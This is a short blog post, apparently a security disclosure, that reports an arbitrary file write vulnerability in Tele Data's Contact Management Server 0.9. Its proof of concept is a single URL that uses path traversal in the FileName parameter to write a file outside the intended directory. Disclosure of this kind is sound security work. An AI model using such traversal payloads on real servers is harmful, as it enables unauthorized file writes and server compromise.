This site is soon to be deprecated by http://www.johnleitch.net

Sunday, May 23, 2010

Tele Data's Contact Management Server 0.9 Arbitrary File Write

An arbitrary file write vulnerability in Tele Data's Contact Management Server 0.9 can be exploited to write to the local file system of the server.

PoC
Login as an administrator and navigate to http://localhost/command.html?Cmd=SQL_Save&SQL=hello%20world&FileName=..\..\..\..\..\..\..\..\..\x.txt

3 comments: